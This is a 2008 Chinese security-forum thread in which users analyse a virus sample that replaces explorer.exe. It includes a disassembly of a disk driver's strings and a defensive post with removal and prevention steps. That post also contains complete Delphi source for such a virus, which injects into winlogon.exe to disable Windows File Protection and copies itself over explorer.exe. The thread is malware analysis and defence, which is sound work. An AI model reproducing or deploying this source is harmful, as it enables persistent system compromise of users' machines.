可以通过微软认证的病毒？？

显示全部楼层 · 发表于 2008-6-11 21:45:44

原帖由 黄金马甲出租 于 2008-6-11 21:08 发表
0104C5C1 57 push edi //0007FF18 0007FF1C ASCII "ws2_32.dll"
0104C5C2 C707 7773325F mov dword ptr ds:[edi],5F327377
010 ...

下载连接的地址还真不少....作者居然不加密

显示全部楼层 · 发表于 2008-6-11 22:15:30

0007FEF8 7FFDFC00 \MutexName = "C~d!3*v2m$21cdDf"

这个的问题吧

显示全部楼层 · 发表于 2008-6-11 22:17:57

就算加密读取的时候也要解密的哈，不过的确很白，没加密，还有更有趣的，第一个是第四代机器狗，楼主文件被修改的罪魁祸首，里面的驱动

.rdata:000107E0 aDosdevicesCaea: ; DATA XREF: .rdata:SymbolicLinkNameo
.rdata:000107E0 unicode 0, <\DosDevices\caea795c5e4ad653>,0
.rdata:0001081A align 4
.rdata:0001081C ; UNICODE_STRING SymbolicLinkName
.rdata:0001081C SymbolicLinkName UNICODE_STRING <38h, 3Ah, offset aDosdevicesCaea>
.rdata:0001081C ; DATA XREF: sub_102A0+3o
.rdata:0001081C ; start+33o
.rdata:0001081C ; "\\DosDevices\\caea795c5e4ad653"
.rdata:00010824 a2UE3 db '2你去3死吧?
.rdata:0001082F db 0F0h ; ?
.rdata:00010830 db 0C9h ; ?
.rdata:00010831 db 0BDh ; ?
.rdata:00010832 db 31h ; 1
.rdata:00010833 db 21h ; !
.rdata:00010834 db 0
.rdata:00010835 db 0
.rdata:00010836 db 0
.rdata:00010837 db 0
.rdata:00010838 aDeviceHarddisk: ; DATA XREF: .rdata:00010860o
.rdata:00010838 unicode 0, <\Device\Harddisk0>,0
.rdata:0001085C unk_1085C db 22h ; " ; DATA XREF: DriverReinitializationRoutine+1Bo
.rdata:0001085D db 0
.rdata:0001085E db 24h ; $
.rdata:0001085F db 0
.rdata:00010860 dd offset aDeviceHarddisk ; "\\Device\\Harddisk0"
.rdata:00010864 a3UE4 db '3你去死4吧?
.rdata:0001086F db 0F0h ; ?
.rdata:00010870 db 0C9h ; ?
.rdata:00010871 db 0BDh ; ?
.rdata:00010872 db 31h ; 1
.rdata:00010873 db 21h ; !
.rdata:00010874 db 0
.rdata:00010875 db 0
.rdata:00010876 db 0
.rdata:00010877 db 0
.rdata:00010878 aDriverAtapi: ; DATA XREF: .rdata:00010898o
.rdata:00010878 unicode 0, <\Driver\atapi>,0
.rdata:00010894 unk_10894 db 1Ah ; DATA XREF: DriverReinitializationRoutine+ECo
.rdata:00010895 db 0
.rdata:00010896 db 1Ch
.rdata:00010897 db 0
.rdata:00010898 dd offset aDriverAtapi ; "\\Driver\\atapi"
.rdata:0001089C a4UE5 db '4你去死吧5?
.rdata:000108A7 db 0F0h ; ?
.rdata:000108A8 db 0C9h ; ?
.rdata:000108A9 db 0BDh ; ?
.rdata:000108AA db 31h ; 1
.rdata:000108AB db 21h ; !
.rdata:000108AC db 0
.rdata:000108AD db 0
.rdata:000108AE db 0
.rdata:000108AF db 0
.rdata:000108B0 aDriverProtecte: ; DATA XREF: .rdata:000108DCo
.rdata:000108B0 unicode 0, <\Driver\ProtectedC>,0
.rdata:000108D6 db 0
.rdata:000108D7 db 0
.rdata:000108D8 unk_108D8 db 24h ; $ ; DATA XREF: DriverReinitializationRoutine+18Co
.rdata:000108D9 db 0
.rdata:000108DA db 26h ; &
.rdata:000108DB db 0
.rdata:000108DC dd offset aDriverProtecte ; "\\Driver\\ProtectedC"
.rdata:000108E0 a5UE db '5你去死吧?
.rdata:000108EA db 0F0h ; ?
.rdata:000108EB a61 db '6山1!',0
.rdata:000108F1 db 0
.rdata:000108F2 db 0
.rdata:000108F3 db 0
.rdata:000108F4 aDriverDisk: ; DATA XREF: .rdata:00010914o
.rdata:000108F4 unicode 0, <\Driver\Disk>,0
.rdata:0001090E db 0
.rdata:0001090F db 0
.rdata:00010910 unk_10910 db 18h ; DATA XREF: DriverReinitializationRoutine+1B8o
.rdata:00010911 db 0
.rdata:00010912 db 1Ah
.rdata:00010913 db 0
.rdata:00010914 dd offset aDriverDisk ; "\\Driver\\Disk"
.rdata:00010918 a6UE db '6你去死吧?
.rdata:00010922 db 0F0h ; ?
.rdata:00010923 db 0C9h ; ?
.rdata:00010924 db 0BDh ; ?
.rdata:00010925 db 37h ; 7
.rdata:00010926 db 21h ; !
.rdata:00010927 db 0
.rdata:00010928 aDriverSafedog: ; DATA XREF: .rdata:0001094Co
.rdata:00010928 unicode 0, <\Driver\SafeDog>,0
.rdata:00010948 unk_10948 db 1Eh ; DATA XREF: DriverReinitializationRoutine+28Ao
.rdata:00010949 db 0
.rdata:0001094A db 20h
.rdata:0001094B db 0
.rdata:0001094C dd offset aDriverSafedog ; "\\Driver\\SafeDog"
.rdata:00010950 align 20h
.rdata:00010950 _rdata ends

复制代码

.data:00010960
.data:00010960 ; Segment type: Pure data
.data:00010960 ; Segment permissions: Read/Write
.data:00010960 _data segment para public 'DATA' use32
.data:00010960 assume cs:_data
.data:00010960 ;org 10960h
.data:00010960 db 0
.data:00010961 db 0
.data:00010962 db 0
.data:00010963 db 0
.data:00010964 db 0
.data:00010965 db 0
.data:00010966 db 0
.data:00010967 db 0
.data:00010968 dword_10968 dd 0 ; DATA XREF: sub_102E6+55r
.data:00010968 ; DriverReinitializationRoutine+2CEw
.data:0001096C dword_1096C dd 0 ; DATA XREF: DriverReinitializationRoutine+92w
.data:00010970 dword_10970 dd 0 ; DATA XREF: DriverReinitializationRoutine+8Dw
.data:00010974 dword_10974 dd 0 ; DATA XREF: DriverReinitializationRoutine+126r
.data:00010974 ; start+49w
.data:00010978 a123UE db '123你去死吧?
.data:00010984 db 0F0h ; ?
.data:00010985 db 0C9h ; ?
.data:00010986 db 0BDh ; ?
.data:00010987 aU? db '!叫你杀我?',0

复制代码

[ 本帖最后由黄金马甲出租于 2008-6-11 22:31 编辑 ]

显示全部楼层 · 发表于 2008-6-11 22:52:02

没大看明白，呵呵，到底除了 EXPLORER这个文件外还有那个文件被感染了啊？呵呵。用冰刃没发现什么可疑的。。。。

显示全部楼层 · 发表于 2008-6-12 01:15:45

根据黄金马甲的反汇编
查到了些资料
但是还是不清除为什么只有在你机器上有问题

0007FEF8 7FFDFC00 \MutexName = "C~d!3*v2m$21cdDf"
这好像是个互斥进程名看程序是否已经运行的但是跟哪台机器没关吧

关于最近很猖獗的explorer病毒
大家知道，以前的病毒感染explorer大部分都是插入线程技术，而最近以电子狗为开端，出现了大批替换explorer.Exe的病毒，导致杀毒软件杀毒后无法进入系统桌面。
本人喜欢手动杀毒，所以在中这种病毒后很长一段时间才发现。
首先我们可以用基础语言编写出这种病毒，代码如下
不用调用dllcache目录下
program Project1;
uses
Windows,TlHelp32;
function LowerCase(const S: string): string; //转小写
var
Ch: Char; L: Integer;
Source, Dest: PChar;
begin
L := Length(S);
SetLength(Result, L);
Source := Pointer(S);
Dest := Pointer(Result);
while L <> 0 do
begin
Ch := Source^;
if (Ch >= ’A’) and (Ch <= ’Z’) then Inc(Ch, 32);
Dest^ := Ch;
Inc(Source);
Inc(Dest);
Dec(L);
end;
end;
function CreatedMutexEx(MutexName: Pchar): Boolean;
var
MutexHandle: dword;
begin
MutexHandle := CreateMutex(nil, True, MutexName);
if MutexHandle <> 0 then
begin
if GetLastError = ERROR_ALREADY_EXISTS then
begin
//CloseHandle(MutexHandle);
Result := False;
Exit;
end;
end;
Result := True;
end;
function GetWinPath: string; //取WINDOWS目录
var
Buf: array[0..MAX_PATH] of char;
begin
GetWindowsDirectory(Buf, MAX_PATH);
Result := Buf;
if Result[Length(Result)]<>’\’ then Result := Result + ’\’;
end;
function GetTempDirectory: string; //取临时目录
var
Buf: array[0..MAX_PATH] of char;
begin
GetTempPath(MAX_PATH,Buf);
Result := Buf;
if Result[Length(Result)]<>’\’ then Result := Result + ’\’;
end;
function EnableDebugPriv : Boolean; //提权为DEBUG
var
hToken : THANDLE;
tp : TTokenPrivileges;
rl : Cardinal;
begin
result := false;
OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken);
if LookupPrivilegeValue(nil, ’SeDebugPrivilege’, tp.Privileges[0].Luid) then
begin
tp.PrivilegeCount := 1;
tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
result := AdjustTokenPrivileges(hToken, False, tp, sizeof(tp), nil, rl);
end;
end;
procedure InjectThread(ProcessHandle: DWORD); //注入winlogon.exe 关闭XP文件保护
var
TID: LongWord;
hSfc,hThread: HMODULE;
pfnCloseEvents: Pointer;
begin
hSfc := LoadLibrary(’sfc_os.dll’);
pfnCloseEvents := GetProcAddress(hSfc,MAKEINTRESOURCE(2));
FreeLibrary(hSfc);
hThread := CreateRemoteThread(ProcessHandle, nil, 0, pfnCloseEvents, nil, 0, TID);
WaitForSingleObject(hThread, 4000);
end;
procedure InitProcess(Name: string); //查找winlogon.exe进程PID
var
FSnapshotHandle: THandle;
FProcessEntry32: TProcessEntry32;
ProcessHandle:dword;
begin
FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
FProcessEntry32.dwSize:=Sizeof(FProcessEntry32);
if Process32First(FSnapshotHandle,FProcessEntry32) then begin
repeat
If Name = LowerCase(FProcessEntry32.szExeFile) then
begin
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, FProcessEntry32.th32ProcessID);
InjectThread(ProcessHandle);
CloseHandle(ProcessHandle);
Break;
end;
until not Process32Next(FSnapshotHandle,FProcessEntry32);
end;
CloseHandle(FSnapshotHandle);
end;
const ExpFile = ’explorer.exe’;
MasterMutex = ’OpenSoul’;
var
s: string;
begin
if not CreatedMutexEx(MasterMutex) then ExitProcess(0); //互拆体
if not EnableDebugPriv then Exit; //提权失败退出
InitProcess(’winlogon.exe’) ; //注入winlogon.exe 先关闭xp的文件保护 .预防系统的还原
s := ParamStr(0) ; //取本名
if LowerCase(s) <> LowerCase(GetWinPath + ExpFile) then //判断自己是不是系统下的explorer.exe
begin //如果不是
MoveFileEx(PChar(GetWinPath + ExpFile),PChar(GetWinPath + ’system32\explorer.exe’),MOVEFILE_REPLACE_EXISTING); //先移动正在运行的explorer.exe
CopyFile(PChar(S),PChar(GetWinPath+ ExpFile),false) ; //把自己复制到windows目录为explorer.exe
end;
WinExec(PChar(GetWinPath + ’system32\explorer.exe’),1); //运行真正的explorer.exe
end.
一旦中招，抱歉，只有重新替换explorer.exe
正确替换办法：首先，在你的电脑的Windows文件夹下找到explorer.exe文件，右键单击该文件，查看属性，查看版本标签。在版本标签中有文件版本编号，记下这个文件版本编号。找一个同你电脑所安装操作系统相同的电脑，使用同样的方法查看explorer.exe的文件版本编号，同你的电脑的编号进行比较。如果完全相同，复制这个文件到你电脑中（使用在邮件中插入附件，QQ传送或者U盘）。
然后按下 Ctrl＋Alt＋Del键（或者在任务栏上单击右键，选择任务管理器），进入任务管理器。在进程窗口中找到explorer.exe进程，右键单击该进程，选择停止进程。现在你桌面上的东西全消失了。单击任务管理器的文件菜单，单击新建任务，单击浏览按钮。将你从其他电脑上弄来的explorer.exe找到，复制粘贴到windows文件夹中，替换原来的exporer.exe文件。然后在任务管理器的新建任务对话框中输入explorer。你的桌面恢复正常了。
而电脑中这种病毒，电脑中毒，系统程序被病毒替换的原因是用户没有开启“windows文件保护”，或者未完全执行“windows文件保护”步骤中的sfc/scannow。
预防方法（适用于未中毒的）：
1、点击“开始”、“运行”。2、键入cmd，按回车。3、键入sfc/scannow，按回车。4、耐心等待windows文件保护扫描完成。5、完成windows文件保护扫描后，再检查以下dllcache文件夹（受保护的系统文件缓存处），发现文件数目达3340个。6、最后，再查看一下“组策略”中的相应设置
如有纰漏，请大家指出并改正

显示全部楼层 · 发表于 2008-6-12 10:58:43

金山毒霸 0

可信认证竟然报安全 [:27:]

显示全部楼层 · 发表于 2008-6-12 17:22:04

黄金马甲知道为什么只有在他的机器上才运行吗？

显示全部楼层 · 发表于 2008-6-12 22:51:34

搞错了，没有看过explorer有没有互斥，结果没有，不过应该把explorer给结束了就可以运行了，貌似explorer是通过PROCESS_QUERY_INFORMATION来判断是否加载的，不敢确定等待大牛指教

显示全部楼层 · 发表于 2008-6-12 22:53:50

看来清理专家的可信认证不能完全相信啊

显示全部楼层 · 发表于 2008-6-14 23:58:24

D:\tools\新建文件夹\EXPLORER.rar <EXPLORER.EXE> - Win32/FakeExplorer.B 特洛伊木马。已隔离。

[病毒样本] 可以通过微软认证的病毒？？

回复 10楼 tgzw1680 的帖子

回复 12楼 saber123 的帖子

回复 16楼 sky123456 的帖子

回复 17楼挪威的冬天的帖子

ca

[病毒样本] 可以通过微软认证的病毒？？

回复 10楼 tgzw1680 的帖子

回复 12楼 saber123 的帖子

回复 16楼 sky123456 的帖子

回复 17楼 挪威的冬天 的帖子

ca

回复 17楼挪威的冬天的帖子